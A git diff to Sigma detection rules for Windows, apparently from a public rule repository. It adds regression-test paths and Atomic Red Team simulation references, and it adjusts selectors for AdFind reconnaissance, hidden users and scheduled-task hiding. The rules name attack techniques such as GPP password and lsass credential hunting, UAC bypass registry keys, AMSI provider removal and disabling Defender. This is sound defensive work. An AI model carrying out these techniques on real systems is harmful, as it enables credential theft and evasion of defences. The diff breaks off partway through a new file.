a/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml @@ -30,3 +30,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml +simulation: + - type: atomic-red-team + name: GPP Passwords (findstr) + technique: T1552.006 + atomic_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f diff --git a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml index d0109ba14..c9ec8ad56 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml @@ -35,3 +35,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml index 9d6198045..1d121bd40 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml @@ -42,3 +42,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml index b7a32c0aa..0ed490719 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml @@ -42,3 +42,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml index c965a45a0..78f130528 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml @@ -61,3 +61,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml +simulation: + - type: atomic-red-team + name: Security Software Discovery + technique: T1518.001 + atomic_guid: f92a380f-ced9-491f-b338-95a991418ce2 diff --git a/rules/windows/process_creation/proc_creation_win_finger_execution.yml b/rules/windows/process_creation/proc_creation_win_finger_execution.yml index d2e22093a..b14b595e7 100644 --- a/rules/windows/process_creation/proc_creation_win_finger_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_finger_execution.yml @@ -26,3 +26,4 @@ detection: falsepositives: - Admin activity (unclear what they do nowadays with finger.exe) level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml b/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml index 358a4eb04..7a9a55b67 100644 --- a/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml @@ -25,3 +25,9 @@ detection: falsepositives: - Unknown level: medium +simulation: + - type: atomic-red-team + name: Display group policy information via gpresult + technique: T1615 + atomic_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml b/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml index 382358d0d..88ee725ac 100644 --- a/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml @@ -25,3 +25,4 @@ detection: falsepositives: - False positives are expected with legitimate ".CHM" level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml index 358a69e68..9eabdbe7e 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml @@ -39,3 +39,4 @@ detection: falsepositives: - Authorized administrative activity level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml index 05f44f4b0..45d17f55e 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml @@ -33,3 +33,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml index 063f0d855..ba831736d 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml @@ -17,7 +17,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community date: 2021-02-02 -modified: 2023-03-05 +modified: 2025-10-24 tags: - attack.discovery - attack.t1018 @@ -35,7 +35,7 @@ detection: - 'trustdmp' - 'dcmodes' - 'adinfo' - - ' dclist ' + - '-sc dclist' - 'computer_pwdnotreqd' - 'objectcategory=' - '-subnets -f' @@ -54,3 +54,13 @@ detection: falsepositives: - Legitimate admin activity level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml +simulation: + - type: atomic-red-team + name: Adfind - Enumerate Active Directory Computer Objects + technique: T1018 + atomic_guid: a889f5be-2d54-4050-bd05-884578748bb4 + - type: atomic-red-team + name: Adfind - Enumerate Active Directory Domain Controller Objects + technique: T1018 + atomic_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e diff --git a/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml index b83cc8047..b7b62c703 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml @@ -32,3 +32,4 @@ detection: falsepositives: - Legitimate administrative use level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml index c9e33cee5..174eb273a 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml @@ -28,3 +28,4 @@ falsepositives: - Legitimate administrative use - Tools with similar commandline (very rare) level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml b/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml index 1336ef273..117747447 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml @@ -37,3 +37,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml index 88046fe9c..dd159a75a 100644 --- a/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml +++ b/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml @@ -40,3 +40,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index 9140fb4ab..d0a9a260a 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -32,3 +32,4 @@ falsepositives: - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml index 84b26b8bf..79a3998a3 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml @@ -30,3 +30,4 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml b/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml index 6501c3d01..232577048 100644 --- a/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml +++ b/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml @@ -32,3 +32,4 @@ detection: falsepositives: - System administrator activities level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml b/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml index 144003fcb..61af8cd78 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml @@ -61,3 +61,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary.yml index 035666bea..52f808b79 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_binary.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_binary.yml @@ -48,3 +48,4 @@ detection: falsepositives: - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml index ced7c19a9..721fd323b 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml @@ -82,3 +82,4 @@ falsepositives: - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist - PsExec installed via Windows Store doesn't contain original filename field (False negative) level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_curl.yml b/rules/windows/process_creation/proc_creation_win_renamed_curl.yml index 590e23495..d4fddffe0 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_curl.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_curl.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml b/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml index bdad75c80..08e274301 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml @@ -24,3 +24,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml index 9979e1358..cd8fbf43c 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml b/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml index 0c541cb72..f7491796d 100644 --- a/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml +++ b/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml @@ -26,3 +26,4 @@ detection: falsepositives: - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml diff --git a/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml b/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml deleted file mode 100644 index 50e86dc34..000000000 --- a/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ /dev/null @@ -1,30 +0,0 @@ -title: Potential Persistence Via New AMSI Providers - Registry -id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 -status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve persistence -references: - - https://persistence-info.github.io/Data/amsi.html - - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c -author: Nasreddine Bencherchali (Nextron Systems) -date: 2022-07-21 -modified: 2023-02-07 -tags: - - attack.persistence -logsource: - category: registry_add - product: windows -detection: - selection: - EventType: CreateKey - TargetObject|contains: - - '\SOFTWARE\Microsoft\AMSI\Providers\' - - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\' - filter: - Image|startswith: - - 'C:\Windows\System32\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter -falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according to your environment -level: high diff --git a/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index 42854def3..aac7441cb 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml @@ -23,7 +23,7 @@ detection: selection: EventType: CreateKey TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\' - filter: + filter_main_default_keys: # Default Keys TargetObject|endswith: - '\Active Setup Temp Folders' @@ -58,7 +58,7 @@ detection: - '\Windows Error Reporting Files' - '\Windows ESD installation files' - '\Windows Upgrade Log Files' - condition: selection and not filter + condition: selection and not 1 of filter_main_* falsepositives: - Legitimate new entry added by windows level: medium diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml index 3324fac1b..1011737df 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml +simulation: + - type: atomic-red-team + name: AMSI Bypass - Remove AMSI Provider Reg Key + technique: T1562.001 + atomic_guid: 13f09b91-c953-438e-845b-b585e51cac9b diff --git a/rules/windows/registry/registry_delete/registry_delete_runmru.yml b/rules/windows/registry/registry_delete/registry_delete_runmru.yml index 7c168a96d..9f6f8863d 100644 --- a/rules/windows/registry/registry_delete/registry_delete_runmru.yml +++ b/rules/windows/registry/registry_delete/registry_delete_runmru.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml diff --git a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml index d0c06457e..c884bbe7f 100644 --- a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml +++ b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml @@ -11,7 +11,7 @@ references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-26 -modified: 2023-02-08 +modified: 2025-10-25 tags: - attack.defense-evasion - attack.t1562 @@ -20,7 +20,6 @@ logsource: category: registry_delete detection: selection: - EventType: DeleteKey TargetObject|contains|all: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' - 'Index' @@ -28,3 +27,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml diff --git a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml index d33cc045d..293b73d44 100644 --- a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml +++ b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml @@ -9,7 +9,7 @@ references: - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ author: Sittikorn S date: 2022-04-15 -modified: 2023-02-08 +modified: 2025-10-25 tags: - attack.defense-evasion - attack.t1562 @@ -18,7 +18,6 @@ logsource: category: registry_delete detection: selection: - EventType: DeleteKey TargetObject|contains|all: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' - 'SD' @@ -26,3 +25,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml diff --git a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml index 27b24208b..1991a7362 100644 --- a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml +++ b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/SBousseaden/status/1387530414185664538 author: Christian Burkard (Nextron Systems) date: 2021-05-03 -modified: 2022-08-05 +modified: 2025-10-31 tags: - attack.persistence - attack.t1136.001 @@ -16,9 +16,15 @@ logsource: detection: selection: TargetObject|contains: '\SAM\SAM\Domains\Account\Users\Names\' - TargetObject|endswith: '$' + TargetObject|endswith: '$\(Default)' Image|endswith: '\lsass.exe' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml +simulation: + - type: atomic-red-team + name: Create Hidden User in Registry + technique: T1564.002 + atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c diff --git a/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml index f5e9d556a..b8a126dfd 100644 --- a/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml +++ b/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml @@ -42,3 +42,13 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml +simulation: + - type: atomic-red-team + name: Windows Add Registry Value to Load Service in Safe Mode without Network + technique: T1112 + atomic_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 + - type: atomic-red-team + name: Windows Add Registry Value to Load Service in Safe Mode with Network + technique: T1112 + atomic_guid: c173c948-65e5-499c-afbe-433722ed5bd4 diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 922861fe9..4e2079f06 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -38,3 +38,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml +simulation: + - type: atomic-red-team + name: Add Port Monitor persistence in Registry + technique: T1547.010 + atomic_guid: d34ef297-f178-4462-871e-9ce618d44e50 diff --git a/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml index b6451dfe2..8c69e5a2c 100644 --- a/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml +++ b/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml @@ -22,3 +22,9 @@ detection: falsepositives: - Legitimate use of the feature (alerts should be investigated either way) level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml +simulation: + - type: atomic-red-team + name: Allow RDP Remote Assistance Feature + technique: T1112 + atomic_guid: 86677d0e-0b5e-4a2b-b302-454175f9aa9e diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml index d502fa46e..5caf8facc 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using sdclt DelegateExecute + technique: T1548.002 + atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7 diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index d07c281b1..7f5f49021 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using Event Viewer (cmd) + technique: T1548.002 + atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index e9082ba3b..ff94c3caf 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml @@ -28,3 +28,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using SilentCleanup Task + technique: T1548.002 + atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 diff --git a/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml b/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml index 6cae9accb..9b1c27028 100644 --- a/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml +++ b/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml @@ -6,7 +6,7 @@ description: | Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md author: frack113 date: 2022-01-01 modified: 2024-03-25 @@ -26,3 +26,13 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml +simulation: + - type: atomic-red-team + name: Changing RDP Port to Non Standard Port via Powershell + technique: T1021.001 + atomic_guid: 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 + - type: atomic-red-team + name: Changing RDP Port to Non Standard Port via Command_Prompt + technique: T1021.001 + atomic_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 diff --git a/rules/windows/registry/registry_set/registry_set_change_security_zones.yml b/rules/windows/registry/registry_set/registry_set_change_security_zones.yml index 847597d58..7fa7512ac 100644 --- a/rules/windows/registry/registry_set/registry_set_change_security_zones.yml +++ b/rules/windows/registry/registry_set/registry_set_change_security_zones.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Administrative scripts level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml +simulation: + - type: atomic-red-team + name: Add Domain to Trusted Sites Zone + technique: T1112 + atomic_guid: cf447677-5a4e-4937-a82c-e47d254afd57 diff --git a/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 48f581187..69a576d19 100644 --- a/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml @@ -18,11 +18,17 @@ logsource: detection: selection: TargetObject|endswith: - - '\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity' - '\Control\DeviceGuard\HypervisorEnforcedCodeIntegrity' - '\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity\Enabled' + - '\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity' Details: 'DWORD (0x00000000)' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml +simulation: + - type: atomic-red-team + name: Disable Hypervisor-Enforced Code Integrity (HVCI) + technique: T1562.001 + atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020 diff --git a/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml b/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml index 7a5593f2d..22b34dbcd 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml +simulation: + - type: atomic-red-team + name: Disable Administrative Share Creation at Startup + technique: T1070.005 + atomic_guid: 99c657aa-ebeb-4179-a665-69288fdd12b8 diff --git a/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml b/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml index 0f17d3905..392f3670f 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml @@ -25,3 +25,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml +simulation: + - type: atomic-red-team + name: Disable Microsoft Defender Firewall via Registry + technique: T1562.004 + atomic_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 diff --git a/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml b/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml index 942ec0a23..1f6beae84 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml @@ -22,3 +22,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml +simulation: + - type: atomic-red-team + name: Disable Windows Security Center Notifications + technique: T1112 + atomic_guid: 45914594-8df6-4ea9-b3cc-7eb9321a807e diff --git a/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml b/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml new file mode 100644 index 000000000..006582cfd --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml @@ -0,0 +1,41 @@ +title: Potential Persistence Via New AMSI Providers - Registry +id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 +status: test +description: | + Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan 